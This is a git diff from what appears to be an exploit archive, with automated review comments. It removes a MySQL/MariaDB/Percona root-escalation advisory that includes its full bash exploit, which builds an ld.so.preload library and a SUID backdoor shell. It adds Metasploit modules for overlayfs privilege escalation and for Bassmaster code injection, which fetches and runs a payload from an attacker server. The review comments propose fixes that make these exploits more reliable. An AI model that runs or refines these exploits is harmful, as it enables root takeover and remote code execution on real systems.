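Review bot: The existence check under "Set target paths" in 40679.sh prints a message that names the wrong product, `The specified MySQL catalina.out log ($ERRORLOG) doesn't exist`, which looks carried over from a different script; it should read `The specified MySQL error log ($ERRORLOG) doesn't exist. Try again.`. The `ctrl_c` handler also tells the operator to use a `-deferred` switch, but the only argument handling in this file is the `$# -lt 1` test and `ERRORLOG="$1"`, so that sentence describes an option the script does not have and should be dropped. `$ERRORLOG` is expanded unquoted in `[ ! -f $ERRORLOG ]` and in the `rm -f $ERRORLOG` / `touch $ERRORLOG` lines of `cleanexit`, so a path containing whitespace makes the cleanup act on files other than the one named. Writing `rm -f "$ERRORLOG"` and `touch "$ERRORLOG"` keeps a lab run confined to the intended path.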
@@ -1,531 +0,0 @@ -============================================= -- Release date: 01.11.2016 -- Discovered by: Dawid Golunski -- Severity: High -- CVE-2016-6664 / OCVE-2016-5617 -- http://legalhackers.com -============================================= - - -I. VULNERABILITY -------------------------- - -MariaDB / MySQL / PerconaDB - Root Privilege Escalation - -MySQL - <= 5.5.51 - <= 5.6.32 - <= 5.7.14 - -MariaDB - All current - -Percona Server - < 5.5.51-38.2 - < 5.6.32-78-1 - < 5.7.14-8 - -Percona XtraDB Cluster - < 5.6.32-25.17 - < 5.7.14-26.17 - < 5.5.41-37.0 - - -II. BACKGROUND -------------------------- - -MySQL: - -"MySQL is the world's most popular open source database. -Whether you are a fast growing web property, technology ISV or large -enterprise, MySQL can cost-effectively help you deliver high performance, -scalable database applications." - -"Many of the world's largest and fastest-growing organizations including -Facebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time -and money powering their high-volume Web sites, business-critical systems and -packaged software." - -http://www.mysql.com/products/ -http://www.mysql.com/why-mysql/ - --- - -MariaDB: - -"MariaDB is one of the most popular database servers in the world. -It’s made by the original developers of MySQL and guaranteed to stay open source. -Notable users include Wikipedia, WordPress.com and Google. - -MariaDB turns data into structured information in a wide array of applications, -ranging from banking to websites. It is an enhanced, drop-in replacement for MySQL. -MariaDB is used because it is fast, scalable and robust, with a rich ecosystem of -storage engines, plugins and many other tools make it very versatile for a wide -variety of use cases." 
- -https://mariadb.org/about/ - --- - -PerconaDB: - -"Percona Server for MySQL is a free, fully compatible, enhanced, open source -drop-in replacement for MySQL that provides superior performance, scalability -and instrumentation. -With over 3,000,000 downloads, Percona Server’s self-tuning algorithms and support -for extremely high-performance hardware delivers excellent performance and reliability." - -https://www.percona.com/software/mysql-database/percona-server - - -III. INTRODUCTION -------------------------- - -MySQL-based databases including MySQL, MariaDB and PerconaDB are affected -by a privilege escalation vulnerability which can let attackers who have -gained access to mysql system user to further escalate their privileges -to root user allowing them to fully compromise the system. -The vulnerability stems from unsafe file handling of error logs and -other files. - - -IV. DESCRIPTION -------------------------- - -The error.log file on most default installations of MySQL/PerconaDB/MariaDB -databases is stored either in /var/log/mysql or /var/lib/mysql directory. - -The permissions on the file and directory look as follows: - -root@trusty:/var/lib/mysql# ls -la /var/log/mysql -total 468 -drwxr-s--- 2 mysql adm 4096 Sep 11 06:25 . -drwxrwxr-x 36 root syslog 4096 Sep 11 06:25 .. --rw-r----- 1 mysql adm 0 Sep 11 06:25 error.log - -root@trusty:/var/lib/mysql# ls -lad /var/log/mysql -drwxr-s--- 2 mysql adm 4096 Sep 11 06:25 /var/log/mysql - - -mysqld_safe wrapper that is normally used for starting MySQL daemon and -creating/reopening the error.log performs certain unsafe file operations that -may allow attackers to gain root privileges. - -The wrapper script contains a 'while' loop shown below which monitors the mysqld -process and performs a restart in case of the process failure. 
-The restart involves re-creation of the error.log file if syslog logging has -not been configured instead of error log files (file-based logging is the -default setting on most installations). - - ---------[ mysqld_safe ]-------- -[...] - -while true -do - rm -f "$pid_file" # Some extra safety - - start_time=`date +%M%S` - - eval_log_error "$cmd" - - if [ $want_syslog -eq 0 -a ! -f "$err_log" ]; then - touch "$err_log" # hypothetical: log was renamed but not - chown $user "$err_log" # flushed yet. we'd recreate it with - chmod "$fmode" "$err_log" # wrong owner next time we log, so set - fi # it up correctly while we can! - -[...] - -------------------------------- - -As can be seen, the error.log file is created (touch) and chowned to the user -running the mysqld daemon (typically 'mysql'). - -The operation is vulnerable to a symlink attack. - -Attackers who obtained access to mysql account for example through CVE-2016-6663 -vulnerability described at: - -http://legalhackers.com/advisories/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-OCVE-2016-5616-Exploit.html - -would gain access to /var/log or /var/lib/mysql directories (owned by mysql user) -and could therefore easily remove the error.log file and replace it -with a symlink to an arbitrary system file which would result in creating in -arbitrary file on the system with mysql privileges and could be used to escalate -privileges. - -The privilege escalation could be triggered instantly (without the need to wait -for mysql service restart/reboot) by attackers having 'mysql' account by simply -killing the mysqld child process (launched by the mysqld_safe wrapper). - -When the mysqld process gets terminated, the wrapper will then re-itertate the -loop shown above and immediately create a mysql-owned file in the location -specified by the attacker in the symlink thus allowing attackers to quickly -escalate their privileges. - - -V. 
PROOF OF CONCEPT EXPLOIT -------------------------- - --------[ mysql-chowned.sh ]------ - -#!/bin/bash -p -# -# MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit -# mysql-chowned.sh (ver. 1.0) -# -# CVE-2016-6664 / OCVE-2016-5617 -# -# Discovered and coded by: -# -# Dawid Golunski -# dawid[at]legalhackers.com -# -# http://legalhackers.com -# -# -# This PoC exploit allows attackers to (instantly) escalate their privileges -# from mysql system account to root through unsafe error log handling. -# The exploit requires that file-based logging has been configured (default). -# To confirm that syslog logging has not been enabled instead use: -# grep -r syslog /etc/mysql -# which should return no results. -# -# This exploit can be chained with the following vulnerability: -# CVE-2016-6663 / OCVE-2016-5616 -# which allows attackers to gain access to mysql system account (mysql shell). -# -# In case database server has been configured with syslog you may also use: -# CVE-2016-6662 as an alternative to this exploit. -# -# Usage: -# ./mysql-chowned.sh path_to_error.log -# -# See full advisory for details at: -# -# http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html -# -# Disclaimer: -# For testing purposes only. Do no harm. -# - -BACKDOORSH="/bin/bash" -BACKDOORPATH="/tmp/mysqlrootsh" -PRIVESCLIB="/tmp/privesclib.so" -PRIVESCSRC="/tmp/privesclib.c" -SUIDBIN="/usr/bin/sudo" - -function cleanexit { - # Cleanup - echo -e "\n[+] Cleaning up..." - rm -f $PRIVESCSRC - rm -f $PRIVESCLIB - rm -f $ERRORLOG - touch $ERRORLOG - if [ -f /etc/ld.so.preload ]; then - echo -n > /etc/ld.so.preload - fi - echo -e "\n[+] Job done. Exiting with code $1 \n" - exit $1 -} - -function ctrl_c() { - echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation." 
- cleanexit 0 -} - -#intro -echo -e "\033[94m \nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \nmysql-chowned.sh (ver. 1.0)\n\nCVE-2016-6664 / OCVE-2016-5617\n" -echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m" - -# Args -if [ $# -lt 1 ]; then - echo -e "\n[!] Exploit usage: \n\n$0 path_to_error.log \n" - echo -e "It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\n" - exit 3 -fi - -# Priv check - -echo -e "\n[+] Starting the exploit as \n\033[94m`id`\033[0m" -id | grep -q mysql -if [ $? -ne 0 ]; then - echo -e "\n[!] You need to execute the exploit as mysql user! Exiting.\n" - exit 3 -fi - -# Set target paths -ERRORLOG="$1" -if [ ! -f $ERRORLOG ]; then - echo -e "\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again.\n" - exit 3 -fi -echo -e "\n[+] Target MySQL log file set to $ERRORLOG" - -# [ Active exploitation ] - -trap ctrl_c INT -# Compile privesc preload library -echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)" -cat <<_solibeof_>$PRIVESCSRC -#define _GNU_SOURCE -#include -#include -#include -#include - #include - #include - #include - -uid_t geteuid(void) { - static uid_t (*old_geteuid)(); - old_geteuid = dlsym(RTLD_NEXT, "geteuid"); - if ( old_geteuid() == 0 ) { - chown("$BACKDOORPATH", 0, 0); - chmod("$BACKDOORPATH", 04777); - //unlink("/etc/ld.so.preload"); - } - return old_geteuid(); -} -_solibeof_ -/bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl" -if [ $? -ne 0 ]; then - echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC." - cleanexit 2; -fi - - -# Prepare backdoor shell -cp $BACKDOORSH $BACKDOORPATH -echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`" - -# Safety check -if [ -f /etc/ld.so.preload ]; then - echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety." 
- exit 2 -fi - -# Symlink the log file to /etc -rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG -if [ $? -ne 0 ]; then - echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink." - cleanexit 3 -fi -echo -e "\n[+] Symlink created at: \n`ls -l $ERRORLOG`" - -# Wait for MySQL to re-open the logs -echo -ne "\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\n" -read -p "Do you want to kill mysqld process to instantly get root? :) ? [y/n] " THE_ANSWER -if [ "$THE_ANSWER" = "y" ]; then - echo -e "Got it. Executing 'killall mysqld' now..." - killall mysqld -fi -while :; do - sleep 0.1 - if [ -f /etc/ld.so.preload ]; then - echo $PRIVESCLIB > /etc/ld.so.preload - rm -f $ERRORLOG - break; - fi -done - -# /etc/ dir should be owned by mysql user at this point -# Inject the privesc.so shared library to escalate privileges -echo $PRIVESCLIB > /etc/ld.so.preload -echo -e "\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \n`ls -l /etc/ld.so.preload`" -echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload" -echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`" -chmod 755 /etc/ld.so.preload - -# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) -echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!" -sudo 2>/dev/null >/dev/null - -#while :; do -# sleep 0.1 -# ps aux | grep mysqld | grep -q 'log-error' -# if [ $? -eq 0 ]; then -# break; -# fi -#done - -# Check for the rootshell -ls -l $BACKDOORPATH -ls -l $BACKDOORPATH | grep rws | grep -q root -if [ $? -eq 0 ]; then - echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`" - echo -e "\n\033[94mGot root! The database server has been ch-OWNED !\033[0m" -else - echo -e "\n[!] Failed to get root" - cleanexit 2 -fi - - -# Execute the rootshell -echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! 
\n" -$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB" -$BACKDOORPATH -p - -# Job done. -cleanexit 0 - - - -------------EOF------------------ - - -Example run -~~~~~~~~~~~~~~~~ - -mysql_suid_shell.MYD-4.3$ whoami -mysql - -omysql_suid_shell.MYD-4.3$ dpkg -l | grep percona-server-server -iU percona-server-server 5.6.32-78.0-1.xenial amd64 Percona Server database server -iF percona-server-server-5.6 5.6.32-78.0-1.xenial amd64 Percona Server database server binaries - -mysql_suid_shell.MYD-4.3$ ./mysql-chowned.sh /var/lib/mysql/xenial-percona.err - -MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit -mysql-chowned.sh (ver. 1.0) - -CVE-2016-6664 / OCVE-2016-5617 - -Discovered and coded by: - -Dawid Golunski -http://legalhackers.com - -[+] Starting the exploit as -uid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker) - -[+] Target MySQL log file set to /var/lib/mysql/xenial-percona.err - -[+] Compiling the privesc shared library (/tmp/privesclib.c) - -[+] Backdoor/low-priv shell installed at: --rwxr-xr-x 1 mysql attacker 1037528 Nov 1 05:08 /tmp/mysqlrootsh - -[+] Symlink created at: -lrwxrwxrwx 1 mysql attacker 18 Nov 1 05:08 /var/lib/mysql/xenial-percona.err -> /etc/ld.so.preload - -[+] Waiting for MySQL to re-open the logs/MySQL service restart... -Do you want to kill mysqld process to instantly get root? :) ? [y/n] y -Got it. Executing 'killall mysqld' now... - -[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: --rw-r----- 1 mysql root 19 Nov 1 05:08 /etc/ld.so.preload - -[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload - -[+] The /etc/ld.so.preload file now contains: -/tmp/privesclib.so - -[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root! --rwsrwxrwx 1 root root 1037528 Nov 1 05:08 /tmp/mysqlrootsh - -[+] Rootshell got assigned root SUID perms at: --rwsrwxrwx 1 root root 1037528 Nov 1 05:08 /tmp/mysqlrootsh - -Got root! 
The database server has been ch-OWNED ! - -[+] Spawning the rootshell /tmp/mysqlrootsh now! - -mysqlrootsh-4.3# whoami -root - -mysqlrootsh-4.3# exit -exit - -[+] Cleaning up... - -[+] Job done. Exiting with code 0 - - - -Video PoC: -~~~~~~~~~~~~~ - -http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html - - -VI. BUSINESS IMPACT -------------------------- - -Attackers who obtained mysql account through other vulnerabilities -(such as CVE-2016-6663) could use this exploit to gain root access -and fully compromise the system. - -VII. SYSTEMS AFFECTED -------------------------- - -MySQL - <= 5.5.51 - <= 5.6.32 - <= 5.7.14 - -MariaDB - All current - -Percona Server - < 5.5.51-38.2 - < 5.6.32-78-1 - < 5.7.14-8 - -Percona XtraDB Cluster - < 5.6.32-25.17 - < 5.7.14-26.17 - < 5.5.41-37.0 - -VIII. SOLUTION -------------------------- - -Vendors have released patches after private disclosure. -Update to the latest version of your DBMS. - - -IX. REFERENCES -------------------------- - -http://legalhackers.com - -This advisory: -http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html - -Exploit source code: -http://legalhackers.com/exploits/mysql-chowned.sh - -CVE-2016-6663 vulnerability which can allow attackers to obtain 'mysql' system account: -http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html - -Video PoC: -http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html - -CVE-2016-6664 -http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6664 - -http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL - - - -X. CREDITS -------------------------- - -The vulnerability has been discovered by Dawid Golunski -dawid (at) legalhackers (dot) com - -http://legalhackers.com - -XI. 
REVISION HISTORY -------------------------- - -01.11.2016 - Advisory released - - -XII. LEGAL NOTICES -------------------------- - -The information contained within this advisory is supplied "as-is" with -no warranties or guarantees of fitness of use or otherwise. I accept no -responsibility for any damage caused by the use or misuse of this information. \ No newline at end of file diff --git a/platforms/linux/local/40688.rb b/platforms/linux/local/40688.rb new file mode 100755 index 000000000..daa62ad3b --- /dev/null +++ b/platforms/linux/local/40688.rb 
@@ -0,0 +1,293 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require "msf/core" + +class MetasploitModule < Msf::Exploit::Local + Rank = GoodRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Overlayfs Privilege Escalation', + 'Description' => %q{ + This module attempts to exploit two different CVEs related to overlayfs. + CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55 + 3.16.0-25 (14.10 default) < 3.16.0-41 + 3.19.0-18 (15.04 default) < 3.19.0-21 + CVE-2015-8660: + Ubuntu: + 3.19.0-18 < 3.19.0-43 + 4.2.0-18 < 4.2.0-23 (14.04.1, 15.10) + Fedora: + < 4.2.8 (vulnerable, un-tested) + Red Hat: + < 3.10.0-327 (rhel 6, vulnerable, un-tested) + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'h00die ', # Module + 'rebel' # Discovery + ], + 'DisclosureDate' => 'Jun 16 2015', + 'Platform' => [ 'linux'], + 'Arch' => [ ARCH_X86, ARCH_X86_64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => + [ + [ 'CVE-2015-1328', { } ], + [ 'CVE-2015-8660', { } ] + ], + 'DefaultTarget' => 1, + 'DefaultOptions' => + { + 'payload' => 'linux/x86/shell/reverse_tcp' # for compatibility due to the need on cve-2015-1328 to run /bin/su + }, + 'References' => + [ + [ 'EDB', '39166'], # CVE-2015-8660 + [ 'EDB', '37292'], # CVE-2015-1328 + [ 'CVE', '2015-1328'], + [ 'CVE', '2015-8660'] + ] + )) + register_options( + [ + OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]), + OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]) + ], self.class) + end + + def check + def mounts_exist?() + vprint_status('Checking if mount points exist') + if target.name == 'CVE-2015-1328' + if not directory?('/tmp/ns_sploit') + vprint_good('/tmp/ns_sploit not 
created') + return true + else + print_error('/tmp/ns_sploit directory exists. Please delete.') + return false + end + elsif target.name == 'CVE-2015-8660' + if not directory?('/tmp/haxhax') + vprint_good('/tmp/haxhax not created') + return true + else + print_error('/tmp/haxhax directory exists. Please delete.') + return false + end + end + end + + def kernel_vuln?() + os_id = cmd_exec('grep ^ID= /etc/os-release') + case os_id + when 'ID=ubuntu' + kernel = Gem::Version.new(cmd_exec('/bin/uname -r')) + case kernel.release.to_s + when '3.13.0' + if kernel.between?(Gem::Version.new('3.13.0-24-generic'),Gem::Version.new('3.13.0-54-generic')) + vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-1328") + return true + else + print_error("Kernel #{kernel} is NOT vulnerable") + return false + end + when '3.16.0' + if kernel.between?(Gem::Version.new('3.16.0-25-generic'),Gem::Version.new('3.16.0-40-generic')) + vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-1328") + return true + else + print_error("Kernel #{kernel} is NOT vulnerable") + return false + end + when '3.19.0' + if kernel.between?(Gem::Version.new('3.19.0-18-generic'),Gem::Version.new('3.19.0-20-generic')) + vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-1328") + return true + elsif kernel.between?(Gem::Version.new('3.19.0-18-generic'),Gem::Version.new('3.19.0-42-generic')) + vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-8660") + return true + else + print_error("Kernel #{kernel} is NOT vulnerable") + return false + end + when '4.2.0' + if kernel.between?(Gem::Version.new('4.2.0-18-generic'),Gem::Version.new('4.2.0-22-generic')) + vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-8660") + return true + else + print_error("Kernel #{kernel} is NOT vulnerable") + return false + end + else + print_error("Non-vuln kernel #{kernel}") + return false + end + when 'ID=fedora' + kernel = Gem::Version.new(cmd_exec('/usr/bin/uname -r').sub(/\.fc.*/, '')) # we need to remove the 
trailer after .fc + # irb(main):008:0> '4.0.4-301.fc22.x86_64'.sub(/\.fc.*/, '') + # => "4.0.4-301" + if kernel.release < Gem::Version.new('4.2.8') + vprint_good("Kernel #{kernel} is vulnerable to CVE-2015-8660. Exploitation UNTESTED") + return true + else + print_error("Non-vuln kernel #{kernel}") + return false + end + else + print_error("Unknown OS: #{os_id}") + return false + end + end + + if mounts_exist?() && kernel_vuln?() + return CheckCode::Appears + else + return CheckCode::Safe + end + end + + def exploit + + if check != CheckCode::Appears + fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!') + end + + filename = rand_text_alphanumeric(8) + executable_path = "#{datastore['WritableDir']}/#{filename}" + payloadname = rand_text_alphanumeric(8) + payload_path = "#{datastore['WritableDir']}/#{payloadname}" + + def has_prereqs?() + gcc = cmd_exec('which gcc') + if gcc.include?('gcc') + vprint_good('gcc is installed') + else + print_error('gcc is not installed. Compiling will fail.') + end + return gcc.include?('gcc') + end + + compile = false + if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True' + if has_prereqs?() + compile = true + vprint_status('Live compiling exploit on system') + else + vprint_status('Dropping pre-compiled exploit on system') + end + end + if check != CheckCode::Appears + fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!') + end + + def upload_and_chmod(fname, fcontent, cleanup=true) + print_status "Writing to #{fname} (#{fcontent.size} bytes)" + rm_f fname + write_file(fname, fcontent) + cmd_exec("chmod +x #{fname}") + if cleanup + register_file_for_cleanup(fname) + end + end + + def on_new_session(session) + super + if target.name == 'CVE-2015-1328' + session.shell_command("/bin/su") #this doesnt work on meterpreter????? 
+ # we cleanup here instead of earlier since we needed the /bin/su in our new session + session.shell_command('rm -f /etc/ld.so.preload') + session.shell_command('rm -f /tmp/ofs-lib.so') + end + end + + if compile + begin + if target.name == 'CVE-2015-1328' + # direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size + # Also removed the on-the-fly compilation of ofs-lib.c and we do that manually ahead of time, or drop the binary. + path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-1328', '1328.c') + fd = ::File.open( path, "rb") + cve_2015_1328 = fd.read(fd.stat.size) + fd.close + + # pulled out from 1328.c's LIB define + path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-1328', 'ofs-lib.c') + fd = ::File.open( path, "rb") + ofs_lib = fd.read(fd.stat.size) + fd.close + else + # direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size + path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-8660', '8660.c') + fd = ::File.open( path, "rb") + cve_2015_8660 = fd.read(fd.stat.size) + fd.close + end + rescue + compile = false #hdm said external folder is optional and all module should run even if external is deleted. 
If we fail to load, default to binaries + end + end + + + if compile + if target.name == 'CVE-2015-1328' + cve_2015_1328.gsub!(/execl\("\/bin\/su","su",NULL\);/, + "execl(\"#{payload_path}\",\"#{payloadname}\",NULL);") + upload_and_chmod("#{executable_path}.c", cve_2015_1328) + ofs_path = "#{datastore['WritableDir']}/ofs-lib" + upload_and_chmod("#{ofs_path}.c", ofs_lib) + cmd_exec("gcc -fPIC -shared -o #{ofs_path}.so #{ofs_path}.c -ldl -w") # compile dependency file + register_file_for_cleanup("#{ofs_path}.c") + else + cve_2015_8660.gsub!(/os.execl\('\/bin\/bash','bash'\)/, + "os.execl('#{payload_path}','#{payloadname}')") + upload_and_chmod("#{executable_path}.c", cve_2015_8660) + end + vprint_status("Compiling #{executable_path}.c") + cmd_exec("gcc -o #{executable_path} #{executable_path}.c") # compile + register_file_for_cleanup(executable_path) + else + if target.name == 'CVE-2015-1328' + path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-1328', '1328') + fd = ::File.open( path, "rb") + cve_2015_1328 = fd.read(fd.stat.size) + fd.close + upload_and_chmod(executable_path, cve_2015_1328) + + path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-1328', 'ofs-lib.so') + fd = ::File.open( path, "rb") + ofs_lib = fd.read(fd.stat.size) + fd.close + ofs_path = "#{datastore['WritableDir']}/ofs-lib" + # dont auto cleanup or else it happens too quickly and we never escalate ourprivs + upload_and_chmod("#{ofs_path}.so", ofs_lib, false) + + # overwrite with the hardcoded variable names in the compiled versions + payload_filename = 'lXqzVpYN' + payload_path = '/tmp/lXqzVpYN' + else + path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8660', '8660') + fd = ::File.open( path, "rb") + cve_2015_8660 = fd.read(fd.stat.size) + fd.close + upload_and_chmod(executable_path, cve_2015_8660) + # overwrite with the hardcoded variable names in the compiled versions + payload_filename = '1H0qLaq2' + payload_path = '/tmp/1H0qLaq2' + end + 
end + + upload_and_chmod(payload_path, generate_payload_exe) + vprint_status('Exploiting...') + output = cmd_exec(executable_path) + output.each_line { |line| vprint_status(line.chomp) } + end +end \ No newline at end of file diff --git a/platforms/linux/remote/40689.rb b/platforms/linux/remote/40689.rb new file mode 100755 index 000000000..0ef65aad6 --- /dev/null +++ b/platforms/linux/remote/40689.rb 
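Review bot: Every source and binary load in `exploit` opens the file with `::File.open`, reads it and calls `fd.close` by hand, so the handle stays open whenever `read` raises. The bare `rescue` around the compile-time loads then sets `compile = false` without reporting why. `::File.binread(path)` reads and closes in one call, e.g. `cve_2015_1328 = ::File.binread(path)`. The handler would be clearer as `rescue ::Errno::ENOENT => e` followed by `vprint_error(e.message)`, so that a missing `external` tree can be told apart from any other failure. The same open/read/close pattern repeats four more times in the pre-compiled branch.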
@@ -0,0 +1,168 @@ +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Bassmaster Batch Arbitrary JavaScript Injection Remote Code Execution', + 'Description' => %q{ + This module exploits an un-authenticated code injection vulnerability in the bassmaster + nodejs plugin for hapi. The vulnerability is within the batch endpoint and allows an + attacker to dynamically execute JavaScript code on the server side using an eval. + + Note that the code uses a '\x2f' character so that we hit the match on the regex. + }, + 'Author' => + [ + 'mr_me ', # msf + 'Jarda Kotesovec' # original bug finder + ], + 'References' => + [ + [ 'CVE', '2014-7205'], + [ 'URL', 'https://nodesecurity.io/advisories/bassmaster_js_injection'], # nodejs advisory + ], + 'License' => MSF_LICENSE, + 'Platform' => ['linux', 'bsd'], # binary > native JavaScript + 'Arch' => [ARCH_X86, ARCH_X86_64], + 'Privileged' => false, + 'Targets' => + [ + [ 'Bassmaster <= 1.5.1', {} ] # Other versions are also affected + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 1 2016')) + register_options( + [ + Opt::RPORT(8080), # default port for the examples/batch.js file + OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/batch"]), # default route for the examples/batch.js file + OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]), + ], self.class) + end + + def check + + # So if we can append an encapsulated string into the body + # we know that we can execute arbitrary JavaScript code + rando = rand_text_alpha(8+rand(8)) + check = "+'#{rando}'" + + # testing + requests = [ + {:method => "get", :path => "/profile"}, + {:method => "get", :path => "/item"}, + {:method => "get", :path => "/item/$1.id#{check}"}, # need 
to match this /(?:\/)(?:\$(\d)+\.)?([^\/\$]*)/g; + ] + + post = {:requests => requests} + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(datastore['URIPATH']), + 'ctype' => 'application/json', + 'data' => post.to_json + }) + + # default example app + if res and res.code == 200 and res.body =~ /#{rando}/ + return CheckCode::Vulnerable + + # non-default app + elsif res and res.code == 500 and res.body =~ /#{rando}/ + return CheckCode::Appears + end + + return CheckCode::Safe + end + + def on_request_uri(cli, request) + if (not @pl) + print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") + return + end + print_status("#{rhost}:#{rport} - Sending the payload to the server...") + @elf_sent = true + send_response(cli, @pl) + end + + def send_payload + @bd = rand_text_alpha(8+rand(8)) + pn = rand_text_alpha(8+rand(8)) + register_file_for_cleanup("/tmp/#{@bd}") + cmd = "wget #{@service_url} -O \\x2ftmp\\x2f#{@bd};" + cmd << "chmod 755 \\x2ftmp\\x2f#{@bd};" + cmd << "\\x2ftmp\\x2f#{@bd}" + pay = ";require('child_process').exec('#{cmd}');" + + # pwning + requests = [ + {:method => "get", :path => "/profile"}, + {:method => "get", :path => "/item"}, + {:method => "get", :path => "/item/$1.id#{pay}"}, # need to match this /(?:\/)(?:\$(\d)+\.)?([^\/\$]*)/g; + ] + + post = {:requests => requests} + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(datastore['URIPATH']), + 'ctype' => 'application/json', + 'data' => post.to_json + }) + + # default example app + if res and res.code == 200 and res.body =~ /id/ + return true + + # incase we are not targeting the default app + elsif res and res.code == 500 and es.body !=~ /id/ + return true + end + return false + end + + def start_http_server + @pl = generate_payload_exe + @elf_sent = false + downfile = rand_text_alpha(8+rand(8)) + resource_uri = "\\x2f#{downfile}" + if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") + srv_host = 
datastore['URIHOST'] || Rex::Socket.source_address(rhost) + else + srv_host = datastore['SRVHOST'] + end + + # do not use SSL for the attacking web server + if datastore['SSL'] + ssl_restore = true + datastore['SSL'] = false + end + + @service_url = "http:\\x2f\\x2f#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}" + service_url_payload = srv_host + resource_uri + print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...") + start_service({'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => resource_uri + }}) + datastore['SSL'] = true if ssl_restore + connect + end + + def exploit + start_http_server + if send_payload + print_good("Injected payload") + # we need to delay, for the stager + select(nil, nil, nil, 5) + end + end +end \ No newline at end of file diff --git a/platforms/multiple/local/40686.txt b/platforms/multiple/local/40686.txt new file mode 100755 index 000000000..42c646d60 --- /dev/null +++ b/platforms/multiple/local/40686.txt 
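Review bot: `start_http_server` sets `datastore['SSL'] = false` and restores it only on the line after `start_service`, so an exception raised by `start_service` leaves the shared datastore modified for the rest of the run. Wrapping the call in a `begin` block with `ensure datastore['SSL'] = true if ssl_restore` keeps the restore on every path. `service_url_payload` in the same method is assigned and never read, so it can be dropped.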
@@ -0,0 +1,26 @@
+# thel3l
